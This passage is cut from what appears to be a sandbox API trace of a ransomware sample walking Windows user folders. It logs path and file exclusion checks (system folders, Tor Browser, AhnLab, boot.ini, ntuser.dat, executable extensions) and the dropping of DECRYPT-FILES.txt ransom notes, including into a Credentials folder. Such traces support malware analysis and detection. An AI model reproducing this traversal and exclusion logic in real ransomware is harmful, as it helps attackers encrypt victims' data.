lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\All Users") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="AhnLab") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.956] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0087.956] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.956] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\jkbimi8.tmp") returned 95 [0087.956] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0087.957] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0087.957] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.957] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt") returned 101 [0087.957] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0087.957] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0087.958] CloseHandle (hObject=0x43c) returned 1 [0087.958] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0087.958] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0087.958] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0087.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.958] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.958] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.959] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.959] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.959] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.959] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.959] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.959] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.959] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.959] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.959] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.959] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 83 [0087.959] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.959] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0087.959] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp" [0087.959] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.959] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.960] CloseHandle (hObject=0x0) returned 0 [0087.960] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.960] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0087.960] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0087.960] CloseHandle (hObject=0x438) returned 1 [0087.960] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", cAlternateFileName="{31810~1")) returned 0 [0087.960] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0087.960] CloseHandle (hObject=0x428) returned 1 [0087.960] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.960] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.961] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.961] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.961] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.961] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.961] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.961] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.961] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.961] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.961] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.961] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0087.961] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.961] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0087.961] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\jkbimi8.tmp" [0087.961] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.961] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.961] CloseHandle (hObject=0x0) returned 0 [0087.961] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.962] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0087.962] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0087.962] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0087.962] lstrcatW (in: lpString1="Microsoft", lpString2="\\" | out: lpString1="Microsoft\\") returned="Microsoft\\" [0087.962] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Microsoft\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Program Files") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch=":\\Windows") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Games\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\All Users") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="AhnLab") returned 0x0 [0087.962] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.962] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0087.962] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.962] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\jkbimi8.tmp") returned 55 [0087.962] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0087.965] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0087.965] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.965] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt") returned 61 [0087.965] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0087.965] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0087.966] CloseHandle (hObject=0x42c) returned 1 [0087.967] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned 43 [0087.967] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*" [0087.967] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0087.967] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.967] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.967] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.967] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.967] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0087.967] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0087.967] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0087.967] lstrcatW (in: lpString1="Credentials", lpString2="\\" | out: lpString1="Credentials\\") returned="Credentials\\" [0087.967] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\" [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Program Files") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch=":\\Windows") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Games\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\All Users") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="AhnLab") returned 0x0 [0087.967] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.967] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0087.967] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.967] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\jkbimi8.tmp") returned 67 [0087.968] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0087.968] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0087.968] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.968] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt") returned 73 [0087.968] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0087.968] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0087.969] CloseHandle (hObject=0x43c) returned 1 [0087.970] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0087.970] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0087.970] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0087.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.970] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.970] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.970] lstrcmpW (lpString1="..", 